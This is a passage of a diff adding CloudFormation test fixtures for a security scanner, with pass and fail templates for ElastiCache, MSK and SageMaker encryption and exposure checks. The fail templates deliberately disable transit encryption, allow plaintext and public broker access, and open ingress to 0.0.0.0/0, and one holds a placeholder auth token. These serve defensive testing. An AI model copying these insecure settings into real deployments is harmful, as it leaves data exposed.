+      Engine: redis
+      NumCacheClusters: !Ref NumCacheClusters
+      Port: !Ref RedisPort
+      PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow
+      ReplicationGroupDescription: !Ref ReplicationGroupDescription
+      SecurityGroupIds:
+        - !GetAtt 
+          - SecurityGroup
+          - GroupId
+      SnapshotRetentionLimit: !Ref SnapshotRetentionLimit
+      SnapshotWindow: !Ref SnapshotWindow
+      #TransitEncryptionEnabled: False
+      TransitEncryptionEnabled: False
+      UserGroupIds:
+        - Example
diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml
index 31137999bd5..55b459be5ab 100644
--- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml
@@ -110,7 +110,7 @@ Resources:
       SubnetIds:
         - !Ref SubnetA
         - !Ref SubnetB
-  ReplicationGroup:
+  ReplicationGroupPass:
     Type: 'AWS::ElastiCache::ReplicationGroup'
     Properties:
       AuthToken: 'MySecret!AuthToken$'
@@ -132,16 +132,4 @@ Resources:
       SnapshotWindow: !Ref SnapshotWindow
       #TransitEncryptionEnabled: False
       TransitEncryptionEnabled: True
-Outputs:
-  RGEndpoint:
-    Description: The primary endpoint location
-    Value: !Join 
-      - ''
-      - - 'redis://'
-        - !GetAtt 
-          - ReplicationGroup
-          - PrimaryEndPoint.Address
-        - ':'
-        - !GetAtt 
-          - ReplicationGroup
-          - PrimaryEndPoint.Port
+
diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml
new file mode 100644
index 00000000000..0c71e1fecbc
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml
@@ -0,0 +1,136 @@
+AWSTemplateFormatVersion: 2010-09-09
+Description: >-
+  An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group.
+Parameters:
+  CacheNodeType:
+    Description: The instance type the nodes will launch under.
+    Type: String
+    Default: cache.m3.medium
+    AllowedValues:
+      - cache.t2.micro
+      - cache.t2.small
+      - cache.t2.medium
+      - cache.m3.medium
+      - cache.m3.large
+      - cache.m3.xlarge
+      - cache.m3.2xlarge
+      - cache.r3.large
+      - cache.r3.xlarge
+      - cache.r3.2xlarge
+      - cache.r3.4xlarge
+      - cache.r3.8xlarge
+  MultiAZSupport:
+    Description: >-
+      Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a
+      read-only replica is automatically promoted to a read-write primary
+      cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property.
+    Type: String
+    Default: 'true'
+    AllowedValues:
+      - 'true'
+      - 'false'
+  NumCacheClusters:
+    Description: >-
+      The number of cache clusters for this replication group. If MultiAZ
+      support is enabled, you must specify a value greater than 1.
+    Default: '2'
+    Type: Number
+    MinValue: '1'
+    MaxValue: '6'
+  RedisPort:
+    Description: >-
+      The port number on which each member of the replication group accepts
+      connections.
+    Type: Number
+    Default: '6379'
+    MinValue: '1'
+    MaxValue: '65535'
+  ReplicationGroupDescription:
+    Description: The description of the replication group.
+    Type: String
+    Default: Example replication group
+  VpcId:
+    Description: The VPC to create this ReplicationGroup under
+    Type: 'AWS::EC2::VPC::Id'
+  CidrIp:
+    Description: The CIDR you want to access to the Replication Group
+    Type: String
+    Default: 0.0.0.0/0
+    AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})'
+    MinLength: '9'
+    MaxLength: '18'
+    ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x
+  SnapshotRetentionLimit:
+    Description: >-
+      The number of days that ElastiCache retains automatic snapshots before
+      deleting them.
+    Type: Number
+    Default: '7'
+  SnapshotWindow:
+    Description: >-
+      The time range (in UTC) when ElastiCache takes a daily snapshot of your node group.
+    Type: String
+    Default: '05:00-09:00'
+    AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}'
+    ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00'
+  PreferredMaintenanceWindow:
+    Description: >-
+      The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC).
+    Type: String
+    Default: 'sun:22:00-sun:23:30'
+    AllowedPattern: >-
+      (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}
+    ConstraintDescription: >-
+      must be a valid timestamp range with day of week, for example
+      sun:22:00-sun:23:30
+  SubnetA:
+    Description: >-
+      One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets
+    Type: 'AWS::EC2::Subnet::Id'
+  SubnetB:
+    Description: >-
+      One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets
+    Type: 'AWS::EC2::Subnet::Id'
+Resources:
+  SecurityGroup:
+    Type: 'AWS::EC2::SecurityGroup'
+    Properties:
+      GroupDescription: Security Group for Example Replication Group
+      SecurityGroupIngress:
+        - Description: Redis Traffic
+          CidrIp: !Ref CidrIp
+          FromPort: !Ref RedisPort
+          ToPort: !Ref RedisPort
+          IpProtocol: tcp
+      VpcId: !Ref VpcId
+  SubnetGroup:
+    Type: 'AWS::ElastiCache::SubnetGroup'
+    Properties:
+      Description: Subnet Group for Example Replication Group
+      SubnetIds:
+        - !Ref SubnetA
+        - !Ref SubnetB
+  ReplicationGroupPass2:
+    Type: 'AWS::ElastiCache::ReplicationGroup'
+    Properties:
+      AutomaticFailoverEnabled: !Ref MultiAZSupport
+      AtRestEncryptionEnabled: True
+      #AtRestEncryptionEnabled: False	# Optional parameter
+      CacheNodeType: !Ref CacheNodeType
+      CacheSubnetGroupName: !Ref SubnetGroup
+      Engine: redis
+      NumCacheClusters: !Ref NumCacheClusters
+      Port: !Ref RedisPort
+      PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow
+      ReplicationGroupDescription: !Ref ReplicationGroupDescription
+      SecurityGroupIds:
+        - !GetAtt 
+          - SecurityGroup
+          - GroupId
+      SnapshotRetentionLimit: !Ref SnapshotRetentionLimit
+      SnapshotWindow: !Ref SnapshotWindow
+      #TransitEncryptionEnabled: False
+      TransitEncryptionEnabled: True
+      UserGroupIds:
+        - Example
+
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml
new file mode 100644
index 00000000000..75c5715222c
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml
@@ -0,0 +1,67 @@
+Resources:
+  MSKClusterFAILskip:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
+  MSKClusterFAILnotTLS:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "PLAINTEXT"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml
new file mode 100644
index 00000000000..76f6d776abb
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml
@@ -0,0 +1,37 @@
+Resources:
+  MSKClusterPASSTLS:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml
new file mode 100644
index 00000000000..eb2b5c54f7d
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml
@@ -0,0 +1,73 @@
+Resources:
+  MSKClusterFAILempty:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
+  MSKClusterFAILdeclared:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml
new file mode 100644
index 00000000000..62d1b0ef11f
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml
@@ -0,0 +1,51 @@
+Resources:
+  MSKClusterPASS:
+    Type: AWS::MSK::Cluster
+    Properties:
+      BrokerNodeGroupInfo:
+        ClientSubnets: 
+          - String
+        InstanceType: kafka.m5.8xlarge
+      ClusterName: String
+      EnhancedMonitoring: DEFAULT
+      KafkaVersion: String
+      LoggingInfo:
+        BrokerLogs:
+          CloudWatchLogs:
+            Enabled: True
+            LogGroup: String
+          Firehose:
+            DeliveryStream: String
+            Enabled: True
+          S3:
+            Bucket: String
+            Enabled: True
+            Prefix: String
+      NumberOfBrokerNodes: 3
+      Tags:
+        Key: Value
+  MSKClusterPASSskip:
+    Type: AWS::MSK::Cluster
+    Properties:
+      BrokerNodeGroupInfo:
+        ClientSubnets: 
+          - String
+        InstanceType: kafka.m5.8xlarge
+      ClusterName: String
+      EnhancedMonitoring: DEFAULT
+      KafkaVersion: String
+      LoggingInfo:
+        BrokerLogs:
+          CloudWatchLogs:
+            Enabled: False
+            LogGroup: String
+          Firehose:
+            DeliveryStream: String
+            Enabled: True
+          S3:
+            Bucket: String
+            Enabled: True
+            Prefix: String
+      NumberOfBrokerNodes: 5
+      Tags:
+        Key: Value
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml
new file mode 100644
index 00000000000..9c98c3e79c5
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml
@@ -0,0 +1,57 @@
+Resources:
+  MSKCluster:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "SERVICE_PROVIDED_EIPS"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
+
+  MSKCluster2:
+    Type: AWS::MSK::Cluster
+    Properties:
+      BrokerNodeGroupInfo:
+        BrokerAZDistribution: String
+        ClientSubnets:
+          - String
+        ConnectivityInfo:
+          PublicAccess:
+            Type: SERVICE_PROVIDED_EIPS
+        InstanceType: String
+        SecurityGroups:
+          - String
+      ClusterName: String
+      EnhancedMonitoring: DEFAULT
+      KafkaVersion: String
+      NumberOfBrokerNodes: 5
+      Tags:
+        Key: Value
diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml
new file mode 100644
index 00000000000..28c3db15da3
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml
@@ -0,0 +1,70 @@
+Resources:
+  MSKClusterPASS:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+        ConnectivityInfo:
+          PublicAccess:
+            Type: "DISABLED"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
+  MSKClusterPASS2:
+    Type: "AWS::MSK::Cluster"
+    Properties:
+      ClusterName: "bad"
+      KafkaVersion: "3.2.0"
+      NumberOfBrokerNodes: 2
+      BrokerNodeGroupInfo:
+        StorageInfo:
+          EBSStorageInfo:
+            VolumeSize: 1100
+        ClientSubnets:
+          - "subnet-0562ef1d304b968f4"
+          - "subnet-08895dbf9e060579b"
+        InstanceType: "kafka.t3.small"
+        SecurityGroups:
+          - "sg-002ed1a53dc5fe0ad"
+      ConfigurationInfo:
+        Arn: ""
+        Revision: 0
+      EncryptionInfo:
+        EncryptionAtRest:
+          DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37"
+        EncryptionInTransit:
+          ClientBroker: "TLS"
+          InCluster: true
+      OpenMonitoring:
+        Prometheus:
+          JmxExporter:
+            EnabledInBroker: false
+          NodeExporter:
+            EnabledInBroker: false
+      Tags:
+        pike: "permissions"
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml
new file mode 100644
index 00000000000..843016df1d9
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml
@@ -0,0 +1,40 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerRole:
+    Type: "AWS::IAM::Role"
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: "2012-10-17"
+        Statement:
+          - Effect: "Allow"
+            Principal:
+              Service:
+                - "sagemaker.amazonaws.com"
+            Action:
+              - "sts:AssumeRole"
+
+  MyDataQualityJobDefinitionFail:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJob"
+      RoleArn: !GetAtt MySageMakerRole.Arn
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "my-endpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-sagemaker-bucket/output"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "Continuous"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: "ml.m5.xlarge"
+          VolumeSizeInGB: 20
+          VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"  # Volume-specific KMS Key ID
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml
new file mode 100644
index 00000000000..25f167320ef
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml
@@ -0,0 +1,41 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerRole:
+    Type: "AWS::IAM::Role"
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: "2012-10-17"
+        Statement:
+          - Effect: "Allow"
+            Principal:
+              Service:
+                - "sagemaker.amazonaws.com"
+            Action:
+              - "sts:AssumeRole"
+
+  MyDataQualityJobDefinitionPass:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJob"
+      RoleArn: !GetAtt MySageMakerRole.Arn
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "my-endpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-sagemaker-bucket/output"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "Continuous"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: "ml.m5.xlarge"
+          VolumeSizeInGB: 20
+          VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"  # Volume-specific KMS Key ID
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml
new file mode 100644
index 00000000000..ed0a29af1d8
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml
@@ -0,0 +1,55 @@
+Resources:
+  DataQualityJobDefinitionFail1:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJobDefinition"
+      DataQualityBaselineConfig:
+        BaseliningJobName: "MyBaselineJob"
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "MyEndpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-bucket/output/"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "EndOfJob"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: ml.m5.large
+          VolumeSizeInGB: 50
+      RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+      NetworkConfig:
+        EnableInterContainerTrafficEncryption: false
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
+  DataQualityJobDefinitionFail2:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJobDefinition"
+      DataQualityBaselineConfig:
+        BaseliningJobName: "MyBaselineJob"
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "MyEndpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-bucket/output/"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "EndOfJob"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: ml.m5.large
+          VolumeSizeInGB: 50
+      RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml
new file mode 100644
index 00000000000..5bf80ef36f9
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml
@@ -0,0 +1,29 @@
+Resources:
+  DataQualityJobDefinitionPass:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJobDefinition"
+      DataQualityBaselineConfig:
+        BaseliningJobName: "MyBaselineJob"
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "MyEndpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-bucket/output/"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "EndOfJob"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: ml.m5.large
+          VolumeSizeInGB: 50
+      RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+      NetworkConfig:
+        EnableInterContainerTrafficEncryption: true
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml
new file mode 100644
index 00000000000..fd70539cdbe
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml
@@ -0,0 +1,66 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerRole:
+    Type: "AWS::IAM::Role"
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: "2012-10-17"
+        Statement:
+          - Effect: "Allow"
+            Principal:
+              Service:
+                - "sagemaker.amazonaws.com"
+            Action:
+              - "sts:AssumeRole"
+
+  MyDataQualityJobDefinitionFail1:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJob"
+      RoleArn: !GetAtt MySageMakerRole.Arn
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "my-endpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-sagemaker-bucket/output"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "Continuous"
+      JobResources:
+        ClusterConfig:
